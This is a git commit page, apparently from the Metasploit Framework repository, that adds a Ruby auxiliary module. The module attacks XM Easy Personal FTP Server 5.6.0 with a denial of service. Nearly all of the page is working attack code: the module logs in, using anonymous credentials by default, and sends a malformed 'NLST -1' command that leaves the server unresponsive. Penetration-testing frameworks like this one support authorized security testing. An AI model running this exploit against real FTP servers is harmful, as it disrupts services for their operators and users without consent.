added aux module xmeasy560_nlst.rb from Kris Katterjohn
git-svn-id: file:///home/svn/framework3/trunk@5749 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e016ff2d76
commit
c178428bc6
|
@ -0,0 +1,39 @@
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::Ftp
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'XM Easy Personal FTP Server 5.6.0 NLST DoS',
|
||||||
|
'Description' => %q{
|
||||||
|
This module is a port of shinnai's script. You need
|
||||||
|
a valid login, but even anonymous can do it as long
|
||||||
|
as it has permission to call NLST.
|
||||||
|
},
|
||||||
|
'Author' => 'Kris Katterjohn <katterjohn@gmail.com>',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Version' => '1',
|
||||||
|
'References' =>
|
||||||
|
[ [ 'URL', 'http://milw0rm.com/exploits/6741'] ],
|
||||||
|
'DisclosureDate' => 'Oct 13 2008'))
|
||||||
|
|
||||||
|
# They're required
|
||||||
|
register_options([
|
||||||
|
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
|
||||||
|
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
connect_login
|
||||||
|
|
||||||
|
raw_send("NLST -1\r\n")
|
||||||
|
|
||||||
|
disconnect
|
||||||
|
|
||||||
|
print_status("OK, server may still be technically listening, but it won't respond")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
Loading…
Reference in New Issue